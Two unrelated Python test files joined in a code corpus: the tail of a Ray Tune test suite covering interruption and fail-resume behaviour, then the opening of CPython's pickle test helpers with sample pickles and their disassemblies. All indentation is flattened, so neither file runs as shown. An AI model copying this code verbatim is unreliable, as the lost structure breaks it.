self.driver_semaphore.release() # Driver should continue
self.trainer_semaphore.acquire() # Wait until released
def _run(local_dir, driver_semaphore, trainer_semaphore):
def _train(config):
for i in range(7):
tune.report(val=i)
tune.run(
_train,
local_dir=local_dir,
name="interrupt",
callbacks=[SteppingCallback(driver_semaphore, trainer_semaphore)],
)
class TuneInterruptionTest(unittest.TestCase):
def testExperimentInterrupted(self):
local_dir = tempfile.mkdtemp()
# Unix platforms may default to "fork", which is problematic with
# multithreading and GRPC. The child process should always be spawned.
mp_ctx = multiprocessing.get_context("spawn")
driver_semaphore = mp_ctx.Semaphore()
trainer_semaphore = mp_ctx.Semaphore()
process = mp_ctx.Process(
target=_run,
args=(local_dir, driver_semaphore, trainer_semaphore),
name="tune_interrupt",
)
process.daemon = False
process.start()
exp_dir = os.path.join(local_dir, "interrupt")
# Skip first five steps
for i in range(5):
driver_semaphore.acquire() # Wait for callback
trainer_semaphore.release() # Continue training
driver_semaphore.acquire()
experiment_state_file = None
for file in os.listdir(exp_dir):
if file.startswith("experiment_state"):
experiment_state_file = os.path.join(exp_dir, file)
break
self.assertTrue(experiment_state_file)
last_mtime = os.path.getmtime(experiment_state_file)
# Now send kill signal
os.kill(process.pid, signal.SIGINT)
# Release trainer. It should handle the signal and try to
# checkpoint the experiment
trainer_semaphore.release()
time.sleep(2) # Wait for checkpoint
new_mtime = os.path.getmtime(experiment_state_file)
self.assertNotEqual(last_mtime, new_mtime)
shutil.rmtree(local_dir)
def testInterruptDisabledInWorkerThread(self):
# https://github.com/ray-project/ray/issues/22295
        # Without the fix, tune.run fails inside the worker thread, so
        # event.set() is never reached and this test hangs on event.wait().
event = threading.Event()
def run_in_thread():
def _train(config):
for i in range(7):
tune.report(val=i)
tune.run(
_train,
)
event.set()
thread = threading.Thread(target=run_in_thread)
thread.start()
event.wait()
thread.join()
ray.shutdown()
del os.environ["TUNE_DISABLE_SIGINT_HANDLER"]
class TuneFailResumeGridTest(unittest.TestCase):
class FailureInjectorCallback(Callback):
"""Adds random failure injection to the TrialExecutor."""
def __init__(self, num_trials=20):
self.num_trials = num_trials
def on_step_end(self, trials, **kwargs):
if len(trials) == self.num_trials:
print(f"Failing after {self.num_trials} trials.")
raise RuntimeError
class CheckStateCallback(Callback):
"""Checks state for the experiment initialization."""
def __init__(self, expected_trials=20):
self.expected_trials = expected_trials
self._checked = False
def on_step_begin(self, iteration, trials, **kwargs):
if not self._checked:
assert len(trials) == self.expected_trials
self._checked = True
class CheckTrialResourcesCallback(Callback):
"""Checks if pending trials are requesting the right amount of
resources.
The check happens exactly once after `check_after` number of calls
to on_step_begin(). Note, we deliberately delay the check to after
`check_after` number of steps. This is because when we start a
tuning job from fresh (rather than restored), trial list is still
empty - any check now would be trivial and thus wasted.
"""
def __init__(self, expected_cpu: int, check_after: int = 1):
self._expected_cpu = expected_cpu
self._checked = False
self._check_after = check_after
def on_step_begin(self, iteration: int, trials: List["Trial"], **info):
if not self._checked and iteration >= self._check_after:
for trial in trials:
if trial.status == Trial.PENDING:
assert (
trial.placement_group_factory.required_resources.get(
"CPU", 0
)
== self._expected_cpu
)
self._checked = True
def setUp(self):
self.logdir = tempfile.mkdtemp()
os.environ["TUNE_GLOBAL_CHECKPOINT_S"] = "0"
# Change back to local_mode=True after this is resolved:
# https://github.com/ray-project/ray/issues/13932
ray.init(local_mode=False, num_cpus=2)
from ray.tune import register_trainable
register_trainable("trainable", MyTrainableClass)
def tearDown(self):
os.environ.pop("TUNE_GLOBAL_CHECKPOINT_S")
shutil.rmtree(self.logdir)
ray.shutdown()
def testFailResumeGridSearch(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run("trainable", callbacks=[self.FailureInjectorCallback()], **config)
analysis = tune.run(
"trainable", resume=True, callbacks=[self.CheckStateCallback()], **config
)
assert len(analysis.trials) == 27
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert all(v == 9 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert all(v == 9 for v in test2_counter.values())
# Unfinished trials' resources should be updated.
def testResourceUpdateInResume(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[
self.FailureInjectorCallback(),
self.CheckTrialResourcesCallback(1),
],
**config,
)
analysis = tune.run(
"trainable",
resume=True,
resources_per_trial={"cpu": 2},
callbacks=[self.CheckTrialResourcesCallback(2)],
**config,
)
assert len(analysis.trials) == 27
def testFailResumeWithPreset(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
search_alg = BasicVariantGenerator(
points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
)
config = dict(
num_samples=3 + 3, # 3 preset, 3 samples
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[self.FailureInjectorCallback(5)],
search_alg=search_alg,
**config,
)
analysis = tune.run(
"trainable",
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=5)],
search_alg=search_alg,
**config,
)
assert len(analysis.trials) == 34
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert test_counter.pop(-1) == 4
assert all(v == 10 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert test2_counter.pop(-1) == 4
assert all(v == 10 for v in test2_counter.values())
def testFailResumeAfterPreset(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
search_alg = BasicVariantGenerator(
points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
)
config = dict(
num_samples=3 + 3, # 3 preset, 3 samples
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[self.FailureInjectorCallback(15)],
search_alg=search_alg,
**config,
)
analysis = tune.run(
"trainable",
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=15)],
search_alg=search_alg,
**config,
)
assert len(analysis.trials) == 34
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert test_counter.pop(-1) == 4
assert all(v == 10 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert test2_counter.pop(-1) == 4
assert all(v == 10 for v in test2_counter.values())
def testMultiExperimentFail(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
experiments = []
for i in range(3):
experiments.append(
tune.Experiment(
run=MyTrainableClass,
name="trainable",
num_samples=2,
config={
"test": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 1},
local_dir=self.logdir,
)
)
with self.assertRaises(RuntimeError):
tune.run(
experiments,
callbacks=[self.FailureInjectorCallback(10)],
fail_fast=True,
)
analysis = tune.run(
experiments,
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=10)],
fail_fast=True,
)
assert len(analysis.trials) == 18
def testWarningLargeGrid(self):
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search(list(range(20))),
"test2": tune.grid_search(list(range(20))),
"test3": tune.grid_search(list(range(20))),
"test4": tune.grid_search(list(range(20))),
"test5": tune.grid_search(list(range(20))),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertWarnsRegex(UserWarning, "exceeds the serialization threshold"):
with self.assertRaises(RuntimeError):
tune.run(
"trainable", callbacks=[self.FailureInjectorCallback(10)], **config
)
class TuneExampleTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=2)
def tearDown(self):
ray.shutdown()
_register_all()
def testPBTKeras(self):
from ray.tune.examples.pbt_tune_cifar10_with_keras import Cifar10Model
from tensorflow.python.keras.datasets import cifar10
cifar10.load_data()
validate_save_restore(Cifar10Model)
validate_save_restore(Cifar10Model, use_object_store=True)
def testPyTorchMNIST(self):
from ray.tune.examples.mnist_pytorch_trainable import TrainMNIST
from torchvision import datasets
datasets.MNIST("~/data", train=True, download=True)
validate_save_restore(TrainMNIST)
validate_save_restore(TrainMNIST, use_object_store=True)
def testHyperbandExample(self):
validate_save_restore(MyTrainableClass)
validate_save_restore(MyTrainableClass, use_object_store=True)
def testAsyncHyperbandExample(self):
validate_save_restore(MyTrainableClass)
validate_save_restore(MyTrainableClass, use_object_store=True)
class AutoInitTest(unittest.TestCase):
def testTuneRestore(self):
self.assertFalse(ray.is_initialized())
tune.run("__fake", name="TestAutoInit", stop={"training_iteration": 1})
self.assertTrue(ray.is_initialized())
def tearDown(self):
ray.shutdown()
_register_all()
class SearcherTest(unittest.TestCase):
class MockSearcher(Searcher):
def __init__(self, data):
self.data = data
def save(self, path):
with open(path, "w") as f:
f.write(self.data)
def restore(self, path):
with open(path, "r") as f:
self.data = f.read()
def testSaveRestoreDir(self):
tmpdir = tempfile.mkdtemp()
original_data = "hello-its-me"
searcher = self.MockSearcher(original_data)
searcher.save_to_dir(tmpdir)
searcher_2 = self.MockSearcher("no-its-not-me")
searcher_2.restore_from_dir(tmpdir)
assert searcher_2.data == original_data
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__] + sys.argv[1:]))
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, reap_threads, forget,
save_restore_warnings_filters
)
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
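# A minimal sketch of that outer-loop pattern (illustrative only; it assumes a
# concrete test class that provides self.dumps/self.loads and an `obj` to
# round-trip, as the pickle test classes in this module do):
#
#     for proto in protocols:
#         pickled = self.dumps(obj, proto)
#         self.assert_is_copy(obj, self.loads(pickled))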
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
def identity(x):
return x
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
# Simple mutable object.
class Object:
pass
# Hashable immutable key object containing unhashable mutable data.
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
